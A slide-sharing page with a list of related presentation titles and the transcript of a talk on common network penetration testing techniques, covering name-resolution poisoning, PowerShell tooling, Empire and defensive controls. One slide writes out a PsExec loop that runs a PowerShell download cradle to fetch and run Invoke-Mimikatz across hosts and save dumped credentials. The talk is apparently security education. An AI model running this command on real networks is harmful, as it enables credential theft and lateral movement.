Common Network Penetration Testing Techniques Russel Van Tuyl.

Slides:

Advertisements

Similar presentations

Module 3 Windows Server 2008 Branch Office Scenario.

Advertisements

System and Network Security Practices COEN 351 E-Commerce Security.

Chapter 7 HARDENING SERVERS.

1 ITC242 – Introduction to Data Communications Week 12 Topic 18 Chapter 19 Network Management.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 1: Introduction to Windows Server 2003.

Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.

Firewall 2 * Essential Network Security Book Slides. IT352 | Network Security |Najwa AlGhamdi 1.

Windows 2008 Overview Lecture 1. Windows Networking Evolution Windows for Workgroups – peer-to-peer networking built into the OS Windows NT – separate.

Developing a Security Policy Chapter 2. Learning Objectives Understand why a security policy is an important part of a firewall implementation Determine.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment, Enhanced Chapter 1: Introduction to Windows Server 2003.

Presented by INTRUSION DETECTION SYSYTEM. CONTENT Basically this presentation contains, What is TripWire? How does TripWire work? Where is TripWire used?

Chapter 14 Network Management Business Aspects Architectures Technology.

April WebEx Intel ® Active Management Technology (AMT) LANDesk Provisioning LANDesk Server Manager.

Principles of Computer Security: CompTIA Security + ® and Beyond, Second Edition © 2010 Baselines Chapter 14.

Clinic Security and Policy Enforcement in Windows Server 2008.

Hands-On Microsoft Windows Server 2008 Chapter 1 Introduction to Windows Server 2008.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.

Securing Windows 7 Lesson 10. Objectives Understand authentication and authorization Configure password policies Secure Windows 7 using the Action Center.

1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.

Security Management prepared by Dean Hipwell, CISSP

Security Baseline. Definition A preliminary assessment of a newly implemented system Serves as a starting point to measure changes in configurations and.

Chapter 9: Novell NetWare

User Manager Pro Suite Taking Control of Your Systems Joe Vachon Sales Engineer November 8, 2007.

SECURITY ZONES. Security Zones  A security zone is a logical grouping of resources, such as systems, networks, or processes, that are similar in the.

Module 4: Planning, Optimizing, and Troubleshooting DHCP

1 CHAPTER 3 CLASSES OF ATTACK. 2 Denial of Service (DoS) Takes place when availability to resource is intentionally blocked or degraded Takes place when.

Network and Perimeter Security Paula Kiernan Senior Consultant Ward Solutions.

1 Introduction to Microsoft Windows 2000 Windows 2000 Overview Windows 2000 Architecture Overview Windows 2000 Directory Services Overview Logging On to.

Chapter 2 Securing Network Server and User Workstations.

Small Business Security Keith Slagle April 24, 2007.

Core 3: Communication Systems. Network software includes the Network Operating Software (NOS) and also network based applications such as those running.

HO © 2012 Fluor. All rights reserved. Quick Wins in Vulnerability Management Classification: Confidential Owner: Michael Holcomb Approver: Phil.

Frontline Enterprise Security

Network Infrastructure Microsoft Windows 2003 Network Infrastructure MCSE Study Guide for Exam

Security fundamentals Topic 10 Securing the network perimeter.

Firewalls2 By using a firewall: We can disable a service by throwing out packets whose source or destination port is the port number for that service.

Critical Security Controls & Effective Cyber Defense Hasain “The Wolf”

Implementing Server Security on Windows 2000 and Windows Server 2003 Fabrizio Grossi.

IPv6 security for WLCG sites (preparing for ISGC2016 talk) David Kelsey (STFC-RAL) HEPiX IPv6 WG, CERN 22 Jan 2016.

Information Security tools for records managers Frank Rankin.

Applying the CIS Critical Security Controls to the Cloud

Securing a Host Computer BY STEPHEN GOSNER. Definition of a Host  Host  In networking, a host is any device that has an IP address.  Hosts include.

Unit 2 Personal Cyber Security and Social Engineering Part 2.

SMOOTHWALL FIREWALL By Nitheish Kumarr. INTRODUCTION  Smooth wall Express is a Linux based firewall produced by the Smooth wall Open Source Project Team.

Top 10 Things to Stay Out of the News Ron Schlecht.

PowerShell for Cyber Warriors

NETWORK SECURITY LAB 1170 REHAB ALFALLAJ CT1406. Introduction There are a number of technologies that exist for the sole purpose of ensuring that the.

KAPLAN SCHOOL OF INFORMATION SYSTEMS AND TECHNOLOGY IT375 Window Enterprise Administration Course Name – IT Introduction to Network Security Instructor.

Lecture 19 Page 1 CS 236 Online 6. Application Software Security Why it’s important: –Security flaws in applications are increasingly the attacker’s entry.

Douglas DiJulio Director – Enterprise Operations Application Support Cyber Security.

Common System Exploits Tom Chothia Computer Security, Lecture 17.

Microsoft OS Vulnerabilities April 1, 2010 MIS 4600 – MBA © Abdou Illia.

Defining your requirements for a successful security (and compliance

Chapter 14 Network Management

Working at a Small-to-Medium Business or ISP – Chapter 8

Critical Security Controls

Cyber Security Enterprise Risk Management: Key to an Organization’s Resilience Richard A. Spires CEO, Learning Tree International Former CIO, IRS and.

Security Standard: “reasonable security”

Secure Software Confidentiality Integrity Data Security Authentication

Chris D Hicks Director of IT MCSE, MCP + Internet Security

Cyber Protections: First Step, Risk Assessment

NYBA 2017 Technology, Compliance &

Unit 27: Network Operating Systems

Implementing and Auditing the Critical Controls

National Cyber Security

Information Security Awareness

Implementing Client Security on Windows 2000 and Windows XP Level 150

Cybersecurity Threat Assessment

November 30, 2017 By: Richard D. Condello NRECA Senior Director

6. Application Software Security

Presentation transcript:

Common Network Penetration Testing Techniques Russel Van Tuyl

Security Analyst TN Air National Guard SANS MSISE Student Father of 2, Husband to 1 Russel C. Van Tuyl | Security Analyst | Sword & Shield Enterprise Security 1431 Centerpoint Blvd., Suite 150 | Knoxville, TN P: | M: |

This is how I hack!

External Network (Web) Apps Internal Network Social Engineering Wireless Physical Hack All The Things

Recon/Intel Gathering Vulnerability Identification/Analysis Exploitation Post Exploitation Reporting (boo) Methodology

Phishing

Social Engineering - Pretext

External Assessment

Internal Assessment

How I see networks

Broadcast Messages Go to every host on the subnet Typically in search of a resource (like name resolution) Common Windows Broadcast Protocols NetBIOS RFC 1001 & 1002 LLMNR RFC (Link Scope Multicast) Types Windows Redirector File Server Print Server WPAD

NetBIOS Name Service (NBNS) Broadcast Messages

Link-Local Multicast Name Resolution (LLMNR) Multicast Messages

Web Proxy Autodiscovery Protocol (WPAD) Standard Internet Engineering Task Force (IETF) draft Expired December 1999 Discovery DHCP DNS Proxy Auto-Config (PAC) wpad.dat

Responder by Laurent Trustwave SpiderLabs

runas.exe

Windows PowerShell is an interactive object-oriented command environment with scripting language features that utilizes small programs called cmdlets to simplify configuration, administration, and management of heterogeneous environments in both standalone and networked typologies by utilizing standards-based remoting protocols.

powershell.exe Built on.NET Framework Verb-Noun Tab Complete Alias Structured Data/Objects Syntax Highlighting (version 5) Released in 2006 on XP*/Vista/Server 2003.ps1 Modules.psm1 Integrated Scripting Environment (ISE)

Download Cradle

ForEach ($h in Get-Content C:\hosts.txt){C:\PsExec.exe \\$h -d -e -u ACME\bob -p -s cmd /c powershell -nop -command “& {IEX ((new-object net.webclient).downloadstring(‘\\ \data\Invoke- Mimikatz.ps1′));Invoke-Mimikatz -DumpCreds > \\ \data\%COMPUTERNAME%.txt}”}

questions?

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire

Sensitive Data Image removed for distribution

Strong Passwords Password Database Local Admin Disable & Rename Implement LAPS Credential Theft Protected LSASS Privileged Access Workstations (PAWS) Least Privilege Logging Powershell v5 Monitor & restrict egress

Center for Internet Security (CIS) Critical Security Controls CSC 1: Inventory of Authorized and Unauthorized Devices CSC 2: Inventory of Authorized and Unauthorized Software CSC 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and Servers CSC 4: Continuous Vulnerability Assessment and Remediation CSC 5: Controlled Use of Administrative Privileges CSC 6: Maintenance, Monitoring, and Analysis of Audit Logs CSC 7: and Web Browser Protections CSC 8: Malware Defenses CSC 9: Limitation and Control of Network Ports, Protocols, and Services CSC 10: Data Recovery Capability CSC 11: Secure Configurations for Network Devices such as Firewalls, Routers, and Switches CSC 12: Boundary Defense CSC 13: Data Protection CSC 14: Controlled Access Based on the Need to Know CSC 15: Wireless Access Control CSC 16: Account Monitoring and Control CSC 17: Security Skills Assessment and Appropriate Training to Fill Gaps CSC 18: Application Software Security CSC 19: Incident Response and Management CSC 20: Penetration Tests and Red Team Exercises

1.Don’t patch anything 2.Don’t harden servers 3.Use default/weak passwords, in multiple places 4.Use shared accounts/passwords 5.Use poorly written applications 6.Allow unrestricted inbound traffic 7.Allow unrestricted outbound traffic 8.Use the highest possible privilege levels 9.Put everything on the Internet (bcuz YOLO!) 10. Assume everything is OK How To Get Owned in 10 Easy Steps

Questions?